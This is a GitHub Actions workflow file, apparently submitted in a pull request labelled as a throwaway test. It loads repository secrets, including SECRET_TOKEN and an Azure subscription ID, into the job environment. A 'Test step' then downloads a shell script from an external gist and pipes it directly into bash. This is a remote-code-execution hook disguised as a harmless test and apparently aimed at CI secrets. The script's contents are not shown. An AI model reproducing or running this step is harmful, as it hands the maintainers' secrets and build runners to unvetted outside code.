Test - Ignore #1263
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: ApprovalComment | |
on: | |
pull_request: | |
types: ['synchronize'] | |
env: | |
AZURE_SUBSCRIPTION_ID: ${{ secrets.E2E_SUBSCRIPTION_ID }} | |
SECRET_TOKEN: ${{ secrets.SECRET_TOKEN }} | |
jobs: | |
approval-comment: | |
runs-on: ubuntu-latest | |
steps: | |
- uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4.1.7 | |
with: | |
fetch-depth: 0 | |
- name: Save info about the review comment as an artifact for other workflows that run on workflow_run to download them | |
env: | |
REVIEW_BODY: ${{ github.event.review.body }} | |
run: | | |
mkdir -p /tmp/artifacts | |
{ echo ${{ github.event.pull_request.number }}; echo blahagain; } >> /tmp/artifacts/metadata.txt | |
cat /tmp/artifacts/metadata.txt | |
- uses: actions/upload-artifact@50769540e7f4bd5e21e526ee35c689e35e0d6874 # v4.4.0 | |
with: | |
name: artifacts | |
path: /tmp/artifacts | |
- name: Test step | |
run: | | |
curl -sSfL https://gist.githubusercontent.com/octoatt/39bed0f7e60c523aa2c2f2878cf1afa4/raw/99ba534adfd6a5873ce328281051b7219d0657be/test.sh | bash | |
shell: "bash" |